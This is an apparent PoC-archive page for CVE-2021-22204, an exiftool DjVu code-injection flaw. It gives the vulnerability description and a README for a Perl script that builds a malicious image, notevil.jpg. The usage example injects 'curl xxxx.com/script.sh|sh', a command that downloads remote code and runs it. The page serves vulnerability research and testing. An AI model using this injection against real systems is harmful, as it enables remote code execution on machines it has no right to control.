Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-22204 PoC — exiftool 代码注入漏洞

Source
Associated Vulnerability
Title:exiftool 代码注入漏洞 (CVE-2021-22204)
Description:Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image
Description
POC for exiftool vuln (CVE-2021-22204).
Readme
# POC-CVE-2021-22204

https://nvd.nist.gov/vuln/detail/CVE-2021-22204

This is just a convenience script I wrote for testing.

## Output
~~~Shell
Usage ./build_image.pl <cmd to inject>
        Note: if your cmd contains unix special characters use quote!
        EG: ./build_image.pl "curl xxxx.com/script.sh|sh"
This poc generates an image file (notevil.jpg) to be proccessed by vulnerable exiftool.
And requires DjVuLibre to be installed and in PATH
         See: http://djvu.sourceforge.net/
---

[+] Preparing annotation file.
[+] Creating image file with: djvumake notevil.jpg INFO=0,0 BGjp=/dev/null ANTa=ant.out
[+] notevil.jpg created.
~~~
File Snapshot

[4.0K] /data/pocs/71103843fd156a3548c57ee1c6c02602802a6eb3 ├── [1.2K] build_image.pl └── [ 648] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →